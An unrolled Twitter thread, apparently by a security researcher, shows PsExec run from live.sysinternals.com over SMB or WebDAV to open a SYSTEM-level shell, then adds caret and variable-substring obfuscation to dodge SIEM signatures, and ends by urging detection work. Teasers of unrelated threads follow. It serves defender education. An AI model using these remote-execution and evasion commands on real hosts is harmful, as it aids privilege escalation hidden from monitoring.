Elevate your cmd.exe to LOCAL_SYSTEM?

\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Have you ever seen this being used by an adversary? I haven't but I like it. Image
If you can't use the SMB protocol to hosts on the Internet, try WebDav over HTTPS

net use z: hxxps://live.sysinternals.com/tools && z:\PsExec.exe -s -c cmd.exe

(had to change the URL scheme because twitter would otherwise transform it - see screenshot) Image
And let's add some obfuscation to hide from sloppy signatures or case-sensitive searches in your SIEM

net use z: htT^pS://li^ve.sysInTer^nals.com/toOls && z:\Ps^EXeC.eXe -s c^md.e^xe Image
And we add another layer of obfuscation

net use z: htT^pS://li^ve.sys%SystemRoot:~4,1%nTer^nals.com/toOls && z:\Ps^EX%Public:~5,1%C.eXe -s c^md.e^xe Image
And when we're done with all that kids stuff and decide that we want to do something useful with our life, we check the resulting artefacts, logs, traces and start developing detection for all that evidence to really make a difference

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Florian Roth ⚡️

Florian Roth ⚡️ Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @cyb3rops

1 Aug
I’d like to clarify my position on #Microsoft in general

Many things have improved over the last 10 years .. a lot .. especially with Windows 10/2016.
Today many fellow security researchers that I highly respect work there.

I criticize Microsoft’s response to recent ..
vulnerabilities (or design flaws) because I care about these things and believe that customers do care too.
I don’t think that it is fair / right to tell them to migrate to the cloud-based solution in order to get rid of these issues.

There are still few but good reasons ..
.. not to opt for the cloud.

I strongly believe that weaknesses in default configs that allow an attacker to escalate privs to Domain Admin should be addressed with a KB patch and not just a pointer to an advisory.
Many won’t read it.

I really hope that you continue the ..
Read 4 tweets
26 Oct 20
1/ Since we go through the #Githubification of InfoSec, knowing git has become an essential skill

My recommendations:

Read a tutorial to get to know the basic terminology
rogerdudler.github.io/git-guide/

Do an interactive training but I'd consider it optional
katacoda.com/courses/git
2/
For newcomers or occasional users I'd recommend a GUI

- Github Desktop (Windows, Linux, macOS)
desktop.github.com
github.com/shiftkey/deskt…
- SourceTree (macOS, Windows)
sourcetreeapp.com
- GitKraken (Windows, Linux, macOS)
gitkraken.com

...
3/ What you'll need in practice is called "pull requests", often from your own forked version of another repository

docs.github.com/en/free-pro-te…

It goes like this:
1. Create a fork
2. Modify the fork, add files, change content
3. Create pull request for the original repository
Read 5 tweets
15 Mar 20
1/x A #COVID19 #OffTopic thread for my followers in countries that still enjoy the quiet before the storm.

It is serious. Don't listen to the voices that play it down.
But also don't panic.

The problem with SARS-CoV-2 is that the treatment of severe cases (~5-10%) require ..
2/x .. intensive care beds with respirators.

Here in Germany, we have 29k intensive care beds, most of them occupied long before COVID19.
If only 1% of the citizens get sick, that would be 830k citizens, 83k of them with the severe clinical course of the disease.
3/x I guess you can imagine what that means.

Italy is about 10 days ahead of us.
Doctors in Italy decide every morning in a so called "triage" who gets a bed with lung ventilator and who doesn't, which is basically a death sentence.
These patients slowly suffocate.
Read 7 tweets
9 Nov 19
Log Sources Top 5
(ordered by cost-benefit ratio / volume > detectable threats)

1. Antivirus
2. Windows Eventlog (+Sysmon)
3. Proxy
4. Firewall
5. DNS
1/ I‘ll give some short comments to help you understand the order

In general: I included only those logs that can already be collected in most organizations, when you start a SecMon project.
Bro/Zeek, Suricata, Netflow, etc. would be somewhere between 2 and 4 if available. ..
2/ Some logs are more difficult (cost/effort) to tap into.
e.g. Antivirus logs can often be collected from a single console, while NSM requires high speed network Taps on mirroring ports in central locations (💵). If you have the budget and time, NSM is worth the effort.
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!

Follow Us on Twitter!

:(